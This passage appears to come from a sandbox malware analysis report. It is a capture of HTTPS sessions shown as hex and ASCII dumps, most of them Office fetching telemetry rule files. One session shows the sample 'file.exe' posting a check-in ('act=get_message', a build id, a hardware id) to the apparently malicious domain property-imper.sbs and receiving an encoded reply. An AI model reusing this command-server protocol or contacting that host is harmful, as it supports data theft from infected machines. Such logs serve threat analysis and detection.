                                                                                                                                                                        2024-11-24 04:11:37 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        43192.168.2.74975013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:37 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                        x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041137Z-174c587ffdfx984chC1TEB676g0000000400000000002e9d
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:37 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        44192.168.2.749756104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:39 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=95AFED8A8CF8BAD4D7CBBD6DF28D3732
                                                                                                                                                                        2024-11-24 04:11:39 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=l3mkk6ujtfvdnd20tg13384vu7; expires=Wed, 19-Mar-2025 21:58:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2FwToSba9ErAoZGeurxRd1hEfl4YaMVeWtKQz123VEsVh4u3dVHt2GrjaBZTz7IhEKahk%2BVL5aKPrbtjH8Vbjd0Ma%2B10g69YhuUjI4AmVot9dDcex1dXw%2F7sd5%2BBPQtKLtvB0vU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e63e8bd41e0-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1593016&cwnd=238&unsent_bytes=0&cid=30e802a3512d1891&ts=739&x=0"
                                                                                                                                                                        2024-11-24 04:11:39 UTC214INData Raw: 64 30 0d 0a 38 57 4b 37 6f 76 68 72 78 66 4e 6a 4e 31 34 43 4f 59 6c 64 4b 58 34 56 50 53 75 6e 30 77 43 59 55 41 38 5a 6e 35 2b 56 38 38 47 71 47 5a 6e 58 32 6c 48 6e 6d 78 64 44 4c 6a 68 6c 70 67 45 47 54 79 30 49 42 5a 58 69 4e 62 5a 68 50 69 71 78 72 71 4f 76 37 70 34 45 33 66 37 58 44 36 43 56 54 56 49 6d 5a 78 75 6c 66 30 38 4b 4e 77 63 62 69 2f 46 6c 75 6d 6f 2b 5a 4c 50 6b 74 34 62 6a 79 30 44 54 31 6f 77 62 2f 36 39 4d 61 33 45 7a 41 62 78 7a 47 30 38 67 45 78 71 57 34 43 36 70 5a 6c 4d 32 37 4f 76 77 6b 71 79 74 54 63 6e 44 6c 67 2b 71 6e 6b 31 53 4a 6d 63 62 70 58 39 50 43 6a 63 48 47 34 76 78 5a 62 70 71 50 32 54 43 0d 0a
                                                                                                                                                                        Data Ascii: d08WK7ovhrxfNjN14COYldKX4VPSun0wCYUA8Zn5+V88GqGZnX2lHnmxdDLjhlpgEGTy0IBZXiNbZhPiqxrqOv7p4E3f7XD6CVTVImZxulf08KNwcbi/Flumo+ZLPkt4bjy0DT1owb/69Ma3EzAbxzG08gExqW4C6pZlM27OvwkqytTcnDlg+qnk1SJmcbpX9PCjcHG4vxZbpqP2TC
                                                                                                                                                                        2024-11-24 04:11:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        45192.168.2.74975113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                        x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041139Z-178bfbc474bv587zhC1NYCny5w000000057000000000hpsa
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        46192.168.2.74975213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                        x-ms-request-id: b7a4c0f2-401e-0064-554c-3c54af000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041139Z-15b8b599d88wn9hhhC1TEBry0g000000042g000000000hxv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:39 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        47192.168.2.74975313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                        x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041139Z-178bfbc474bh5zbqhC1NYCkdug00000005eg000000002f59
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:39 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        48192.168.2.74975413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                        x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041139Z-174c587ffdfb485jhC1TEBmc1s00000003qg00000000eter
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:39 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        49192.168.2.74975513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:39 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                        x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041139Z-174c587ffdfb74xqhC1TEBhabc00000003wg00000000d335
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        50192.168.2.74975813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:41 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:41 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                        x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041141Z-178bfbc474bxkclvhC1NYC69g400000005c0000000009mph
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:42 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        51192.168.2.74975713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:41 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:41 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                        x-ms-request-id: 9aadc8db-201e-000c-3931-3c79c4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041141Z-178bfbc474bmqmgjhC1NYCy16c00000005eg00000000eg31
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
